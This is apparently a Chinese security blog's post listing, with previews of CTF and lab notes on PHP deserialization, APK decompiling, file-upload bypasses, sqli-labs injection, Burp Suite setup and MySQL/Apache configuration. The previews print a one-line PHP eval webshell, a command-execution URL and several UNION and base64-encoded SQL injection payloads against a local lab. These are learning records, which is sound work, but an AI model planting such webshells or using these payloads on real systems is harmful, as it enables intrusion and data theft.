- 博客(10)
- 收藏
- 关注
原创 linux下普通用户无法使用root用户登陆mysql解决办法
use mysql;select user, plugin from user;update mysql.user set authentication_string=PASSWORD('123456'),plugin='mysql_native_password' where user='root';select user, plugin from mysql.user;flush privileges;
2021-02-02 11:11:58 622
原创 php反序列化漏洞
php的序列化序列化函数:serialize,反序列化函数:unserialize,例:<?phpclass Test{ public $a = 'ThisA'; protected $b = 'ThisB'; private $c = 'ThisC'; public function test1(){ return "this is test1" ; }}$test = new Test();var_dump(serializ
2020-10-29 16:28:25 623 1
原创 apk反编译
apk的逆向主要有两种方法(目前知道的):直接使用apktool进行反编译,获得工程的smail源码先用解压apk,用dex2jar获得jar文件,再利用jd-gui获得工程的Java源码工具下载apktool: https://ibotpeaches.github.io/Apktool/install/dex2jar: https://github.com/pxb1988/dex2jar/releases/tag/2.0jd-gui: http://java-decompiler.g.
2020-10-22 09:48:47 206
原创 CTF技能梳理系列 ---- 文件上传
主要以CTFHub技能树里的文件上传题目为例无验证直接上传webshell。<?php @eval($_GET[cmd]); ?>payload:http://url/upload/raw_shell.php?cmd=system("cat ../flag_161493477.php"); 前端验证查看页面源码,可以看到前端的JS验证代码:<script>function checkfilesuffix(){ var file=document.
2020-09-02 16:00:57 1483
原创 Sqli-Lab第二部分(Advanced Injections)练习记录(非讲解,个人记录用)
Cookie Injection21. Base64-encodedpayload:uname=LTEnKSBvciB1cGRhdGV4bWwoMCwgY29uY2F0KDB4NWMsIChzZWxlY3QgZGF0YWJhc2UoKSkpLCAxKSM=只是将payload做了一个base64编码22. 同上,只是单引号闭合换成双引号闭合23. Strip comments这题的题目意思没看太明白,不过注入过程发现是过滤了 #,-- 这两种注释的字符,因此只能使用引号闭合,payload如
2020-09-01 17:52:46 333
原创 SQL注入积累
登陆(用户名不存在)登陆验证通常有两种方式:直接对用户输入的账号名和密码进行查询------提示用户名或密码错误针对用户输入的账号名进行查询对应的密码,再和用户输入的密码做比较------用户名错误时会提示用户名不存在这里讨论第二种情况,验证代码逻辑可能如下:select password from xx where username=xx;if(password==pass)then login因此,可以使用如下联合查询方式将自定义字符注入password参数(令username为F
2020-08-26 15:10:55 181
原创 Burpsuite抓包夜神模拟器
主要记录一下通过Burpsuite来对夜神模拟器模拟(安卓)进行抓包的配置过程。前置条件手机获得root权限,且进入开发者模式不知道是不是我这里的个例,夜神模拟器默认的root权限没法抓取流量,需要进入开发者模式才能正常抓包。打开开发者模式的方法:设置——关于手机,点击五下版本号进入开发者模式。安装Xposed框架需要通过这一框架安装JustTrustMe,这是一个去掉HTTPS证书校验的Xposed hook插件。(虽然目前还不是很清楚不装会怎么用)下载链接(包括JTM和Xpose
2020-07-28 14:26:02 3831 1
原创 Sqli-Lab第一部分(Basic Challenges)练习记录(非讲解,个人记录用)
GET - Error based1. Single quotes-Stringhttp://192.168.205.128:8080/Less-1/?id=-1%27%20union%20select%201,2,database()%232. Intiger basedhttp://192.168.205.128:8080/Less-2/?id=-1%20union%20select%201,2,database()%233. Single quotes with twist-stri
2020-07-24 15:01:17 336
原创 在Ubuntu为Apache2配置多个端口
每次重新配置都会忘记步骤,稍微记录一下自用。ports.conf配置文件vim /etc/apache2/ports.conf文件内容# If you just change the port or add more ports here, you will likely also# have to change the VirtualHost statement in# /etc/apache2/sites-enabled/000-default.confListen 80L
2020-07-23 14:53:45 1783
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人